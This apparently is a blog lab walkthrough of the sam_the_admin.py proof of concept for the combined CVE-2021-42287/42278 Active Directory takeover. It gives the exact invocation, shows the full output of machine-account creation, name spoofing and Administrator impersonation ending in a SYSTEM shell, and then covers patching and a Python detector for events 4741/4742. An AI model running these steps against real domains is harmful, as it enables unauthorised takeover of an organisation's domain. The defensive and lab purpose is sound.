A new year and yet another way to take over Microsoft Active Directory.
Back in November last year, Microsoft patched two Active Directory privilege escalation vulnerabilities. When these two vulnerabilities are combined, they allow a standard domain user to take over an Active Directory domain.
These two privilege escalation vulnerabilities are tracked as CVE-2021-42287 and CVE-2021-42278. GitHub user WazeHell created a PoC for the combined takeover attack using Python 3 and Impacket. This tool was released on 11/12/21 on both GitHub and Twitter. Let's go ahead and lab it!

Disclaimer
As always, seek permission before using such tools on a production network, or use a VMware lab; that way no one gets hurt!

Prerequisites
1. A Kali Linux VM (Python 3 and Impacket should already be installed)
2. Download sam_the_admin.py from WazeHell's GitHub repository
3. In this example our VM host IP is 10.1.1.1 and our DC is 10.1.1.10
4. Set up a standard Windows AD domain and a domain user account / password. Make sure the November 2021 security patches are not installed.

Steps
1. Launch a Kali Linux terminal and run the command:
python3 sam_the_admin.py "testdomain/dummy:TestdomainPW!" -dc-ip 10.1.1.10 -shell
2. If all goes well you’ll see the privilege escalation output of the Python script, wherein it creates a machine account and impersonates the administrator.
python3 sam_the_admin.py "testdomain/dummy:TestdomainPW!" -dc-ip 10.1.1.10 -shell
Impacket v0.9.24.dev1+20210727.163808.5f1ced6d - Copyright 2021 SecureAuth Corporation
[*] Selected Target dc1.testdomain.network
[*] Total Domain Admins 1
[*] will try to impersonate Administrator
[*] Current ms-DS-MachineAccountQuota = 10
[*] Adding Computer Account "SAMTHEADMIN-93$"
[*] MachineAccount "SAMTHEADMIN-93$" password = 4Ug3TAHquT^U
[*] Successfully added machine account SAMTHEADMIN-93$ with password redacted.
[*] SAMTHEADMIN-93$ object = CN=SAMTHEADMIN-93,CN=Computers,DC=testdomain,DC=network
[*] SAMTHEADMIN-93$ sAMAccountName == dc
[*] Saving ticket in dc1.ccache
[*] Resting the machine account to SAMTHEADMIN-93$
[*] Restored SAMTHEADMIN-93$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Saving ticket in Administrator.ccache
Impacket v0.9.24.dev1+20210727.163808.5f1ced6d - Copyright 2021 SecureAuth Corporation
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>

3. It will drop to a shell on the DC where you are SYSTEM:
C:\Windows\system32>whoami
nt authority\system

samtheadmin.py

Mitigation
Install the November 2021 Microsoft Security patches for Windows Server platforms in your environment.
As you can see above, the exploit is trivial to perform with minimal effort required.
You can also use the Microsoft 365 Defender threat-hunting query that Microsoft details here.
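The tool output above leaves a very recognisable trail in the domain controller's Security log: a computer account is created by an ordinary domain user (possible because ms-DS-MachineAccountQuota is 10), its sAMAccountName is changed to a name without the trailing "$" that matches the DC, and the name is then restored. The following is an added example, not code from the original post or from the sam_the_admin tool, showing how a defender could flag that sequence. It uses simplified field names for Windows Security events 4741 (computer account created) and 4742 (computer account changed); the event records and the DC sAMAccountName "DC$" are constructed sample values, not real logs.

```python
# Added detection example (not from the original post or the sam_the_admin tool).
# Event IDs follow Windows Security events 4741/4742; the field names are a
# simplified model of those records, and all sample data below is constructed.
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class Event:
    """One Security-log record, reduced to the fields the detection needs."""
    event_id: int                   # 4741 = computer account created, 4742 = computer account changed
    subject: str                    # account that performed the change
    target: str                     # computer account that was created or changed
    old_sam: Optional[str] = None   # 4742 only: sAMAccountName before the change
    new_sam: Optional[str] = None   # 4742 only: sAMAccountName after the change


# Constructed sample log modelled on the tool output shown in the post; not real data.
SAMPLE_EVENTS: List[Event] = [
    Event(4741, "TESTDOMAIN\\dummy", "SAMTHEADMIN-93$"),
    Event(4742, "TESTDOMAIN\\dummy", "SAMTHEADMIN-93$", old_sam="SAMTHEADMIN-93$", new_sam="dc"),
    Event(4742, "TESTDOMAIN\\dummy", "SAMTHEADMIN-93$", old_sam="dc", new_sam="SAMTHEADMIN-93$"),
    Event(4741, "TESTDOMAIN\\svc_join", "WKS-0042$"),  # benign: a provisioning account joining a workstation
]

# Assumed sAMAccountNames of the domain controllers. The post names the DC as
# dc1.testdomain.network; "DC$" is a constructed value for this example.
KNOWN_DC_SAMS: List[str] = ["DC$"]


def is_computer_sam(sam: str) -> bool:
    """Computer accounts normally carry a trailing '$' in their sAMAccountName."""
    return sam.endswith("$")


def find_samaccountname_spoofing(events: List[Event], dc_sams: List[str]) -> List[Dict[str, object]]:
    """Flag 4742 events where a computer account's sAMAccountName loses its trailing '$'.

    Severity is raised to high when the new name matches a domain controller
    (the CVE-2021-42278 pattern). The finding also records whether the same
    principal created the account earlier in the log, which is the
    MachineAccountQuota abuse visible in the tool output.
    """
    dc_names = {s.lower().rstrip("$") for s in dc_sams}
    created_by: Dict[str, str] = {}           # target account -> creating principal
    findings: List[Dict[str, object]] = []
    for ev in events:
        if ev.event_id == 4741:
            created_by[ev.target.lower()] = ev.subject
            continue
        if ev.event_id != 4742 or ev.old_sam is None or ev.new_sam is None:
            continue
        # The rename of interest drops the '$'; the later restore goes the other way and is not flagged.
        if is_computer_sam(ev.old_sam) and not is_computer_sam(ev.new_sam):
            matches_dc = ev.new_sam.lower() in dc_names
            findings.append({
                "account": ev.target,
                "changed_by": ev.subject,
                "renamed_to": ev.new_sam,
                "matches_dc": matches_dc,
                "created_by_same_subject": created_by.get(ev.target.lower()) == ev.subject,
                "severity": "high" if matches_dc else "medium",
            })
    return findings


if __name__ == "__main__":
    for finding in find_samaccountname_spoofing(SAMPLE_EVENTS, KNOWN_DC_SAMS):
        print(finding)
```

Run against the constructed sample, the detector reports a single high-severity finding for SAMTHEADMIN-93$ renamed to "dc" by TESTDOMAIN\dummy, the same principal that created it, and stays silent on the benign workstation join. In a real environment the records would come from the DC's Security log (or a SIEM forwarding 4741/4742), and the DC list from the Domain Controllers OU. Note that the quota value shown in the output (ms-DS-MachineAccountQuota = 10) is what lets a plain domain user create the machine account in the first place; reducing it to 0 is a common hardening step alongside the November 2021 patches.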